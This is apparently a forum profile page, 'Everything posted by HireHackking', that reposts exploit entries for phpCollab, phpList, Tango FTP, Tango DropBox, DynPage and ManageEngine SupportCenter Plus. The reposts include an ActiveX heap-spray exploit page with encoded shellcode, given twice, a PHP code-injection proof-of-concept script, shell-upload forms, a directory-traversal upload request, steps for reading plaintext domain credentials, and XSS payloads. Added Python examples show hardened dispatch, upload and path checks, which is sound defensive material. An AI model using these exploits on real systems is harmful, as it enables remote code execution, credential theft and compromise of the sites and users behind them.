
Everything posted by HireHackking
-
PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload
source: https://www.securityfocus.com/bid/53675/info

phpCollab is prone to unauthorized-access and arbitrary-file-upload vulnerabilities.

Attackers can leverage these issues to gain unauthorized access to application data and to upload and execute arbitrary code in the context of the application.

phpCollab 2.5 is vulnerable; other versions may also be affected.

POST /phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a38e51ed2&action=add&project=&task= HTTP/1.1
Host: 192.0.0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6
Referer: http://192.0.0.2/
Content-Type: multipart/form-data; boundary=---------------------------19548990971636807826563613512
Content-Length: 29914

-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000000
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="maxCustom"


-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="commentsField"

Hello there
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="upload"; filename="filename.jpg"
Content-Type: image/jpeg

file data stripped
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="submit"

Save
-----------------------------19548990971636807826563613512--
-
phpList 2.10.9 - 'Sajax.php' PHP Code Injection
source: https://www.securityfocus.com/bid/53693/info

PHPList is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

PHPList 2.10.9 is vulnerable; other versions may also be affected.

# --------------------------------------- #
# This PoC was written for educational purpose. Use it at your own risk.
# Author will not be responsible for any damage.
# --------------------------------------- #
# 1) Bug
# 2) PoC
# --------------------------------------- #
# 2) Bug :
# An attacker might execute arbitrary PHP code with this vulnerability.
# User tainted data is embedded into a function that compiles
# PHP code on the run and executes it, thus allowing an attacker to inject own PHP code that will be
# executed. This vulnerability can lead to full server compromise.
# Look To The File Named (Sajax.php) In Dir (admin/commonlib/lib) On Line (63)
#
# 63.     $func_name = $_POST["rs"];
#         if (! empty($_POST["rsargs"]))
#             $args = $_POST["rsargs"];
#         else
#             $args = array();
#     }
#
#     if (! in_array($func_name, $sajax_export_list))
#         echo "-:$func_name not callable";
#     else {
#         echo "+:";
# 74.     $result = call_user_func_array($func_name, $args);
#         echo $result;
#     }
#     exit;
# }
#
# So We Have Variable Func Name With Post rs :)
# In Above Of Code We Have $_GET['rs']; So This Is An Attacker Want It.
# Look To Line (74).
# Call_User_Func_Array($func_name, $args);
# Attacker Can Inject In GET Parameter Or POST PHP Code.
# --------------------------------------- #
# 3) PoC :
<?php
// Usage: php poc.php <host> -- posts rs=whoami to Sajax.php on the target
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://$target/Sajax.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "rs=whoami");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
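The pattern the post above points at is a client-supplied function name reaching call_user_func_array. The following is an added example, not phpList's code, of the hardened shape of that dispatch: names from the request are never resolved against the global namespace, only looked up in an explicit registry, and the reply does not reflect the submitted name. The registry, its sample handler (add) and the request values are constructed for this example.

```python
import re

# Added example (not phpList code): registry-based dispatch for an rs/rsargs
# style RPC endpoint. Only functions registered via @sajax.export can be
# invoked; anything else is refused through one fail-closed path.

_IDENT = re.compile(r"^[A-Za-z_][A-Za-z0-9_]{0,63}$")


class DispatchError(Exception):
    """The request named something that is not exported."""


class Dispatcher:
    """Map export names to callables; never call a function by string lookup."""

    def __init__(self):
        self._registry = {}

    def export(self, func):
        """Register a handler under its own name (use as a decorator)."""
        self._registry[func.__name__] = func
        return func

    def call(self, func_name, args=()):
        # Fail closed on anything that is not a plain identifier, so odd
        # values ("a b", embedded NULs, paths) share one rejection path.
        if not isinstance(func_name, str) or not _IDENT.match(func_name):
            raise DispatchError("-:not callable")
        handler = self._registry.get(func_name)
        if handler is None:
            # Do not echo func_name back: the original reflected it verbatim.
            raise DispatchError("-:not callable")
        if not isinstance(args, (list, tuple)):
            raise DispatchError("-:bad arguments")
        return "+:" + str(handler(*args))


sajax = Dispatcher()


@sajax.export
def add(a, b):
    """Sample exported handler (constructed): add two form values."""
    return int(a) + int(b)


def handle_post(form):
    """Simulate the rs/rsargs POST handling; return the response body."""
    try:
        return sajax.call(form.get("rs", ""), form.get("rsargs", []))
    except DispatchError as exc:
        return str(exc)


if __name__ == "__main__":
    print(handle_post({"rs": "add", "rsargs": ["2", "3"]}))
    print(handle_post({"rs": "whoami"}))
```

The registry is the whole control: a name such as whoami or a dunder name is not callable because it was never exported, not because a denylist happened to catch it.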
-
Tango FTP 1.0 (Build 136) - Activex HeapSpray
<HTML>
<BODY>
<input language=JavaScript onclick=Tryme() type=button value="Launch Calc">
<object id=boom classid="clsid:{25982EAA-87CC-4747-BE09-9913CF7DD2F1}"></object>
<br>Tango FTP Activex Heap Spray Exploit</br>
<br>Version:1.0(Build 136)</br>
<br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the 'GetWebStoreURL' member.</br>
<br>Vendor Homepage:http://www.tangoftp.com/index.html</br>
<br>Software Link:http://www.tangoftp.com/downloads/index.html</br>
<br>Author: metacom</br>
<!--Video Poc:http://bit.ly/1fjtq89 -->
<SCRIPT>
var heapspray=unescape(
"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sprayContainer = unescape("%u9090%u9090");
var heapToAddress = 0x0a0a0a0a;
function Tryme() {
    var size_buff = 5000;
    var x = unescape("%0a%0a%0a%0a");
    while (x.length<size_buff) x += x;
    x = x.substring(0,size_buff);
    boom.GetWebStoreURL(x, 1);
}
function getsprayContainer(sprayContainer, sprayContainerSize) {
    while (sprayContainer.length*2<sprayContainerSize) {
        sprayContainer += sprayContainer;
    }
    sprayContainer = sprayContainer.substring(0,sprayContainerSize/2);
    return (sprayContainer);
}
var heapBlockSize = 0x500000;
var SizeOfHeap = 0x30;
var payLoadSize = (heapspray.length * 2);
var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap);
var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize);
for (i=0;i<heapBlocks;i++) {
    memory[i] = sprayContainer + heapspray;
}
</SCRIPT>
</BODY>
</HTML>
-
Tango DropBox 3.1.5 + PRO - Activex HeapSpray
<HTML>
<BODY>
<input language=JavaScript onclick=Tryme() type=button value="Launch Calc">
<object id=boom classid="clsid:{C915F573-4C11-4968-9080-29E611FDBE9F}"></object>
<br>Tango DropBox Activex Heap Spray Exploit</br>
<br>Version:3.1.5 + PRO</br>
<br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the 'GetWebStoreURL' member.</br>
<br>Vendor Homepage:http://etonica.com/dropbox/index.html</br>
<br>Software Link:http://etonica.com/dropbox/download.html</br>
<br>Author: metacom</br>
<!--Video Poc:http://bit.ly/1K0hnYS -->
<SCRIPT>
var heapspray=unescape(
"%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sprayContainer = unescape("%u9090%u9090");
var heapToAddress = 0x0a0a0a0a;
function Tryme() {
    var size_buff = 5000;
    var x = unescape("%0a%0a%0a%0a");
    while (x.length<size_buff) x += x;
    x = x.substring(0,size_buff);
    boom.GetWebStoreURL(x, 1);
}
function getsprayContainer(sprayContainer, sprayContainerSize) {
    while (sprayContainer.length*2<sprayContainerSize) {
        sprayContainer += sprayContainer;
    }
    sprayContainer = sprayContainer.substring(0,sprayContainerSize/2);
    return (sprayContainer);
}
var heapBlockSize = 0x500000;
var SizeOfHeap = 0x30;
var payLoadSize = (heapspray.length * 2);
var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap);
var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize);
for (i=0;i<heapBlocks;i++) {
    memory[i] = sprayContainer + heapspray;
}
</SCRIPT>
</BODY>
</HTML>
-
DynPage 1.0 - 'ckfinder' Multiple Arbitrary File Upload Vulnerabilities
source: https://www.securityfocus.com/bid/53696/info

DynPage is prone to multiple arbitrary-file-upload vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

DynPage 1.0 is vulnerable; other versions may also be affected.

########>>>>> Explo!T <<<<<<##################
# Download : [http://www.dynpage.net/download/dynpage.zip]

### [ Upload Sh3LL.php;.txt ] =>

<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Files" method="post" enctype="multipart/form-data" >
<input name="Files" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

### [ Upload Sh3LL.php;.gif ;.jpeg ] =>

<!-- p0c 1 -->
<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Images" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

<!-- p0c 2 -->
<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Images" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

### [ Upload Sh3LL.php;.swf ;.flv ] =>

<!-- p0c 1 -->
<form action="http://www.example.com/[path]/js/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Flash" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

<!-- p0c 2 -->
<form action="http://www.example.com/[path]/js/ckfinder/ckfinder.html?Type=Flash" method="post" enctype="multipart/form-data" >
<input name="Images" type="file" class="submit" size="80">
<input type="submit" value="Upload !">
</form>

############# << ThE|End
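Both the phpCollab post (an image/jpeg upload whose content is never checked) and the DynPage post above (names such as Sh3LL.php;.txt passing a type filter) come down to the same missing server-side check. The following is an added example, not code from phpCollab, DynPage or CKFinder, of that check: a file is accepted only if its client-supplied name reduces to one base name with one allow-listed extension, and only if its leading bytes are those of the type the extension denotes. The allow-list, the magic-byte table and the sample files are constructed for this example.

```python
import re

# Added example (not phpCollab/DynPage/CKFinder code): server-side upload
# validation that does not trust the client's filename or Content-Type.

# extension -> (expected Content-Type, accepted leading byte sequences)
ALLOWED = {
    "jpg":  ("image/jpeg", (b"\xff\xd8\xff",)),
    "jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
    "png":  ("image/png",  (b"\x89PNG\r\n\x1a\n",)),
    "gif":  ("image/gif",  (b"GIF87a", b"GIF89a")),
}
_STEM = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$")


class UploadRejected(ValueError):
    pass


def validate_upload(client_name, declared_type, data):
    """Return the name to store the file under, or raise UploadRejected."""
    # Keep only the last path component, whichever separator the client used.
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    if "\x00" in base or ";" in base:
        raise UploadRejected("illegal character in filename")
    # Exactly one dot: "shell.php;.txt" is gone already, "shell.php.jpg"
    # fails here, and the stem must be plain characters.
    parts = base.split(".")
    if len(parts) != 2 or not _STEM.match(parts[0]):
        raise UploadRejected("filename must be name.ext with one extension")
    stem, ext = parts[0], parts[1].lower()
    if ext not in ALLOWED:
        raise UploadRejected("extension not allowed")
    expected_type, magics = ALLOWED[ext]
    if declared_type.split(";", 1)[0].strip().lower() != expected_type:
        raise UploadRejected("Content-Type does not match extension")
    # The Content-Type header is client-controlled; the bytes decide.
    if not any(data.startswith(m) for m in magics):
        raise UploadRejected("content is not a valid " + expected_type)
    return stem + "." + ext


if __name__ == "__main__":
    # Constructed sample: a minimal JPEG prefix passes, a PHP file named
    # as a JPEG does not.
    print(validate_upload("filename.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
    try:
        validate_upload("filename.jpg", "image/jpeg", b"<?php echo 'not an image'; ?>")
    except UploadRejected as exc:
        print("rejected:", exc)
```

The returned name is safe to use as a storage key, but the stored file should still live outside the web root (or be served with a fixed image Content-Type and X-Content-Type-Options: nosniff) so that a file which passes the magic check yet also contains script is never interpreted by the server.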
-
ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities
Document Title:
===============
ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1501

Release Date:
=============
2015-06-19

Vulnerability Laboratory ID (VL-ID):
====================================
1501

Common Vulnerability Scoring System:
====================================
6.9

Product & Service Introduction:
===============================
SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, the service contracts and in the process providing a superior customer experience. SupportCenter Plus is commonly deployed on internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk staff (typically Active Directory integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is important to consider when evaluating the risk of the below vulnerabilities.

(Copy of the Vendor Homepage: https://www.manageengine.com/products/support-center/ )

Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-27: Researcher Notification & Coordination (Alain Homewood)
2015-06-19: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Manage Engine
Product: SupportCenter Plus - Web Application 7.90

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
1.1 Improper authentication disclosing password (Authenticated)

Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessible by Administrators. This functionality allows a low privilege user to:

1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory
2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records)

A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains. Typical attack scenarios could include:

1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation).
2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar.

Pre-requisites and considerations include:

- In order to steal existing domain credentials it is necessary for Active Directory integration to have been set up.
- In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this)
- It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn't displayed on the internet accessible login)

1.2 Directory traversal on file upload (Authenticated)

Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories. Potential impacts of this vulnerability include:

1.) Remote code execution ***
2.) Denial of service
3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc)

*** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment:

1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed
2.) The uploaded directory always appends an additional directory (named after the user's ID) which prevents deployment of a packaged or unpackaged WAR file (or similar)

Despite the above limitations I cannot conclusively determine that code execution is not possible.

1.3 Reflected cross site scripting (Authenticated)

Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus.

Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do.
Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector.

Unsanitised user provided input in the `compAcct` parameter is echoed back to the user during requests to /jsp/ResetADPwd.jsp.

Unsanitised user provided input in the `redirectTo` parameter is echoed back to the user during requests to /jsp/CacheScreenWidth.jsp.

All authenticated users are vulnerable to these attack vectors.

Proof of Concept (PoC):
=======================
1.1 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below.

Manual steps to reproduce the vulnerability ...

1.) Set up an Active Directory domain
2.) Install SupportCenter Plus
3.) Login as an administrator and add a Windows domain and associated credentials
4.) Logout and login as a low privilege user (by default there is a guest/guest account)
5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions (e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code)

Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as a low privilege user:

http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP
http://[VULNERABLE]/ImportADUsers.do

Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this:

POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Referer: http://[VULNERABLE]:9090/AdminHome.do
Content-Length: 181
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description=

Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do, selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this:

POST /ImportADUsers.do HTTP/1.1
Host: [VULNERABLE]
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/ImportADUsers.do
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 193

selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true

1.2 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below.

Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request

It is possible to manipulate the "module" parameters to traverse directories. Decompiled source code of the creation of the file path is shown below:

String filePath1 = "Attachments" + filSep + module + filSep + userID1

Note that an additional directory (named after the user's ID) is always appended to the file path. In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2. The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment.
An example POST request is shown below:

POST /workorder/Attachment.jsp?component=Request HTTP/1.1
Host: [VULNERABLE]:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request
Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------17390486101970088239358532669
Content-Length: 1110

-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="filePath"; filename="payload.html"
Content-Type: application/octet-stream

test12345
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="filename"

payload.html
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="vecPath"


-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="vec"


-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="theSubmit"

AttachFile
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="formName"

null
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="component"

../../../../../../../../../../../../
-----------------------------17390486101970088239358532669
Content-Disposition: form-data; name="ATTACH"

Attach
-----------------------------17390486101970088239358532669--

1.3 The cross site scripting web vulnerability can be exploited by remote attackers with low or medium user interaction. For security demonstration or to reproduce follow the provided information and steps below.

Administrator user only:
http://[VULNERABLE]:9090/CustomReportHandler.do?module=run_query_editor_query&reportTitle=test&query=<BODY%20ONLOAD=alert(1)>

Any authenticated user:
http://[VULNERABLE]:9090/jsp/ResetADPwd.jsp?compAcct=%22%3E%3CIFRAME%20SRC=%22http://www.google.com%22%3E%3C/IFRAME%3E
http://[VULNERABLE]:9090/jsp/CacheScreenWidth.jsp?width=1600&redirectTo=";alert(1);//

Security Risk:
==============
1.1 The security risk of the authentication disclosing password vulnerability is estimated as high. (CVSS 6.9)
1.2 The security risk of the directory traversal web vulnerability is estimated as high. (CVSS 5.9)
1.3 The security risk of the cross site scripting web vulnerabilities is estimated as medium. (CVSS 3.3)

Credits & Authors:
==================
Alain Homewood (PwC New Zealand) - [http://vulnerability-lab.com/show.php?user=Alain%20Homewood]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
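Section 1.2 of the advisory above quotes the decompiled path construction ("Attachments" + filSep + module + filSep + userID1) and shows a module value of ../../../../ landing the file at c:\2\payload.html. The following is an added example, not SupportCenter Plus code, of the same construction with the two checks that line lacks: each request-supplied segment is validated on its own, and the joined result is proven to lie below the attachment root. The root directory, the module allow-list and the sample values are constructed for this example.

```python
import os
import re

# Added example (not SupportCenter Plus code): traversal-safe construction of
# <root>/<module>/<userID>/<filename>.

ATTACHMENT_ROOT = os.path.abspath(os.path.join("var", "sc", "Attachments"))
KNOWN_MODULES = {"Request", "Solution", "Contract"}   # constructed allow-list
_SEGMENT = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$")


class PathRejected(ValueError):
    pass


def attachment_path(module, user_id, filename, root=ATTACHMENT_ROOT):
    """Return an absolute path strictly below root, or raise PathRejected."""
    # 1. Validate each request-supplied segment on its own. The module must be
    #    a known value, the user id an integer, and the file name one plain
    #    segment, so neither "../" nor "..\\" ever reaches the join.
    if module not in KNOWN_MODULES:
        raise PathRejected("unknown module")
    if not isinstance(user_id, int) or user_id <= 0:
        raise PathRejected("user id must be a positive integer")
    if not _SEGMENT.match(filename):
        raise PathRejected("illegal file name")
    # 2. Defence in depth: prove the normalised result is still inside root.
    #    commonpath, unlike startswith, is not fooled by a sibling directory
    #    whose name merely begins with the root's name (root="/a/b", "/a/bc").
    target = os.path.normpath(os.path.join(root, module, str(user_id), filename))
    if os.path.commonpath([root, target]) != root:
        raise PathRejected("path escapes the attachment root")
    return target


if __name__ == "__main__":
    print(attachment_path("Request", 2, "screenshot.png"))
    try:
        attachment_path("../../../../../../../../../../../../", 2, "payload.html")
    except PathRejected as exc:
        print("rejected:", exc)
```

The first check is what actually closes the advisory's finding; the commonpath check is there so that a future module or file-name rule that is loosened by mistake still cannot write outside the root.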
-
ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete
Document Title:
===============
ZTE ZXV10 W300 v3.1.0c_DR0 - UI Session Delete Vulnerability

